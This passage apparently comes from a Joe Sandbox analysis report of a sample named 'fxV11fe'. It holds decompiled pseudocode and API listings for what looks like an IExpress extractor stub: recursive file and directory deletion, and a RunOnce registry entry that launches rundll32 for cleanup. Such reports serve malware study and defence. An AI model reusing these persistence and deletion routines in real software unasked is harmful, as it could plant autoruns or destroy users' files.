                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                            				_t21 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_t65 = __ecx;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_pop(_t62);
                                                                                                                                                                                                                                            					_pop(_t66);
                                                                                                                                                                                                                                            					_pop(_t46);
                                                                                                                                                                                                                                            					return E00A06CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A01680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                            					_t58 = 0x104;
                                                                                                                                                                                                                                            					E00A016B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                            					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                            					_t63 = _t22;
                                                                                                                                                                                                                                            					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t58 = 0x104;
                                                                                                                                                                                                                                            						E00A01680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                            						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							_t58 = 0x104;
                                                                                                                                                                                                                                            							E00A016B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                            							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                            							DeleteFileA( &_v280);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                            								E00A016B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                            								_t58 = 0x104;
                                                                                                                                                                                                                                            								E00A0658A( &_v280, 0x104, 0xa01140);
                                                                                                                                                                                                                                            								E00A02390( &_v284);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                            					} while (_t36 != 0);
                                                                                                                                                                                                                                            					FindClose(_t63); // executed
                                                                                                                                                                                                                                            					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00A08A3A,00A011F4,00A08A3A,00000000,?,?), ref: 00A023F6
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00A011F8), ref: 00A02427
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00A011FC), ref: 00A0243B
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A02495
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00A024A3
                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A024AF
                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00A024BE
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00A08A3A), ref: 00A024C5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836429354-0
                                                                                                                                                                                                                                            • Opcode ID: 0f30a0ac0e9593af536d23c7c498f8f564f69335049fa9e6f597236d55512dfb
                                                                                                                                                                                                                                            • Instruction ID: f1397be2b35f8795ba3f0471b582359a833cad95bb1b380b9c0b9ecd7c5f3883
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f30a0ac0e9593af536d23c7c498f8f564f69335049fa9e6f597236d55512dfb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7531723160474CABC320DFA4ED8DBEB73ACABD4305F04492DB555862D0EB75994E8792
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                            			E00A02BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				signed char _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t4 = GetVersion();
                                                                                                                                                                                                                                            				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                            					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t17 = _t21;
                                                                                                                                                                                                                                            							 *0xa0a288(0, 1, 0, 0);
                                                                                                                                                                                                                                            							 *_t21();
                                                                                                                                                                                                                                            							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                            							if(_t24 != _t24) {
                                                                                                                                                                                                                                            								_t17 = 4;
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t20 = _a12;
                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                            				 *0xa09124 = 0;
                                                                                                                                                                                                                                            				if(E00A02CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                            					_t9 = E00A02F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                            					_t22 = _t9; // executed
                                                                                                                                                                                                                                            					E00A052B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                            					if(_t22 != 0) {
                                                                                                                                                                                                                                            						_t32 =  *0xa08a3a; // 0x0
                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                            							_t19 =  *0xa09a2c; // 0x0
                                                                                                                                                                                                                                            							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            								E00A01F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t6 =  *0xa08588; // 0x0
                                                                                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                                                                                            					CloseHandle(_t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 =  *0xa09124; // 0x80070002
                                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000002,00000000,?,00A06BB0,00A00000,00000000,00000002,0000000A), ref: 00A02C03
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A06BB0,00A00000,00000000,00000002,0000000A), ref: 00A02C18
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A02C28
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00A06BB0,00A00000,00000000,00000002,0000000A), ref: 00A02C98
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                            • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                            • Opcode ID: 19a3638bf38c2a71754845cd280336f653de157f91530ccd8b00a66801b72578
                                                                                                                                                                                                                                            • Instruction ID: aecc8a047dcff85e72b58a4b78f6118dd0a671a2f6c79850d7f2dc44e00960ae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19a3638bf38c2a71754845cd280336f653de157f91530ccd8b00a66801b72578
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3511CE3170031EABE720ABF5BD8CBAF3769AB88391B044125F941E32E1DA30DC438765
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A06F40() {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E00A06EF0); // executed
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x00a06f45
                                                                                                                                                                                                                                            0x00a06f4d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A06F45
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: e6f5d7458d92b6466dd517de2edbeb0dca5da6e5632f0a15adefd7dd547d6544
                                                                                                                                                                                                                                            • Instruction ID: 2eaf7aee03360523b9e6ec1280c4dda2be5a915a46095f02a3bb6753f6bfa6c9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6f5d7458d92b6466dd517de2edbeb0dca5da6e5632f0a15adefd7dd547d6544
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9590027425130857D6105BB0ED5941975A16B5D706B815960A011C44D5DB6040625552
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A0202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				void* _v532;
                                                                                                                                                                                                                                            				int _v536;
                                                                                                                                                                                                                                            				int _v540;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				void _t56;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				intOrPtr* _t81;
                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t79 = __edx;
                                                                                                                                                                                                                                            				_t28 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                            				_t84 = 0x104;
                                                                                                                                                                                                                                            				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                            				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                            				_t66 = 0;
                                                                                                                                                                                                                                            				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                            					return E00A06CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(_t86);
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E00A0171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                            					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                            					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                            					if(_t41 != 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t87 = _t87 + 1;
                                                                                                                                                                                                                                            					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                            					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                            					_t79 = _t84;
                                                                                                                                                                                                                                            					E00A0658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                            					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                            					_t84 = _t46;
                                                                                                                                                                                                                                            					if(_t84 == 0) {
                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0xa09a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                                            							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							_pop(_t86);
                                                                                                                                                                                                                                            							goto L24;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						_t72 =  &_v268;
                                                                                                                                                                                                                                            						_t80 = _t72 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t49 =  *_t72;
                                                                                                                                                                                                                                            							_t72 = _t72 + 1;
                                                                                                                                                                                                                                            						} while (_t49 != 0);
                                                                                                                                                                                                                                            						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                            						_t81 = 0xa091e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t50 =  *_t81;
                                                                                                                                                                                                                                            							_t81 = _t81 + 1;
                                                                                                                                                                                                                                            						} while (_t50 != 0);
                                                                                                                                                                                                                                            						_t84 = _t73 + 0x50 + _t81 - 0xa091e5;
                                                                                                                                                                                                                                            						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa091e5);
                                                                                                                                                                                                                                            						if(_t90 != 0) {
                                                                                                                                                                                                                                            							 *0xa08580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                            							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            							E00A0171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                            							_t75 = _t90;
                                                                                                                                                                                                                                            							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                            							_t79 = _t23;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t56 =  *_t75;
                                                                                                                                                                                                                                            								_t75 = _t75 + 1;
                                                                                                                                                                                                                                            							} while (_t56 != 0);
                                                                                                                                                                                                                                            							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                            							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                            							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                            							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t79 = 0x4b5;
                                                                                                                                                                                                                                            						E00A044B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                            					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                            					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                            					if(_t91 == 0) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            						E00A0658A( &_v268, 0x104, 0xa01140);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            				 *0xa08530 = _t66;
                                                                                                                                                                                                                                            				goto L23;
                                                                                                                                                                                                                                            			}


































                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A02050
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A0205F
                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A0208C
                                                                                                                                                                                                                                              • Part of subcall function 00A0171E: _vsnprintf.MSVCRT ref: 00A01750
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A020C9
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A020EA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A02103
                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A02122
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A02134
                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A02144
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A0215B
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A0218C
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A021C1
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A021E4
                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A0223D
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A02249
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A02250
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                            • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                                                            • API String ID: 178549006-217856272
                                                                                                                                                                                                                                            • Opcode ID: 3afe3b40258836cf2ada729bb91c9026aa2006d8e3c02246ef0529ef9755b02a
                                                                                                                                                                                                                                            • Instruction ID: 9c1356d584a6e9356c1c40c9a7349de49abdadc9852c0dbb9641106a4a08005d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3afe3b40258836cf2ada729bb91c9026aa2006d8e3c02246ef0529ef9755b02a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C519471A4031CABDB20DFA4EC4DFEB777CEB54700F0042A9BA45E61D1DA759E4A8B50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 232 a055a0-a055d9 call a0468f LocalAlloc 235 a055db-a055f1 call a044b9 call a06285 232->235 236 a055fd-a0560c call a0468f 232->236 250 a055f6-a055f8 235->250 242 a05632-a05643 lstrcmpA 236->242 243 a0560e-a05630 call a044b9 LocalFree 236->243 246 a05645 242->246 247 a0564b-a05659 LocalFree 242->247 243->250 246->247 248 a05696-a0569c 247->248 249 a0565b-a0565d 247->249 255 a056a2-a056a8 248->255 256 a0589f-a058b5 call a06517 248->256 252 a05669 249->252 253 a0565f-a05667 249->253 254 a058b7-a058c7 call a06ce0 250->254 257 a0566b-a0567a call a05467 252->257 253->252 253->257 255->256 260 a056ae-a056c1 GetTempPathA 255->260 256->254 269 a05680-a05691 call a044b9 257->269 270 a0589b-a0589d 257->270 264 a056f3-a05711 call a01781 260->264 265 a056c3-a056c9 call a05467 260->265 275 a05717-a05729 GetDriveTypeA 264->275 276 a0586c-a05890 GetWindowsDirectoryA call a0597d 264->276 272 a056ce-a056d0 265->272 269->250 270->254 272->270 273 a056d6-a056df call a02630 272->273 273->264 286 a056e1-a056ed call a05467 273->286 280 a05730-a05740 GetFileAttributesA 275->280 281 a0572b-a0572e 275->281 276->264 287 a05896 276->287 284 a05742-a05745 280->284 285 a0577e-a0578f call a0597d 280->285 281->280 281->284 289 a05747-a0574f 284->289 290 a0576b 284->290 297 a05791-a0579e call a02630 285->297 298 a057b2-a057bf call a02630 285->298 286->264 286->270 287->270 292 a05771-a05779 289->292 294 a05751-a05753 289->294 290->292 296 a05864-a05866 292->296 294->292 299 a05755-a05762 call a06952 294->299 296->275 296->276 297->290 309 a057a0-a057b0 call a0597d 297->309 306 a057c1-a057cd GetWindowsDirectoryA 298->306 307 a057d3-a057f8 call a0658a GetFileAttributesA 298->307 299->290 308 a05764-a05769 299->308 306->307 314 a0580a 307->314 315 
a057fa-a05808 CreateDirectoryA 307->315 308->285 308->290 309->290 309->298 316 a0580d-a0580f 314->316 315->316 317 a05811-a05825 316->317 318 a05827-a0585c SetFileAttributesA call a01781 call a05467 316->318 317->296 318->270 323 a0585e 318->323 323->296
                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E00A055A0(void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v265;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t35;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                            				long _t48;
                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				char _t60;
                                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                                            				char _t66;
                                                                                                                                                                                                                                            				int _t67;
                                                                                                                                                                                                                                            				int _t68;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				int _t70;
                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                            				int _t73;
                                                                                                                                                                                                                                            				CHAR* _t82;
                                                                                                                                                                                                                                            				CHAR* _t88;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                            
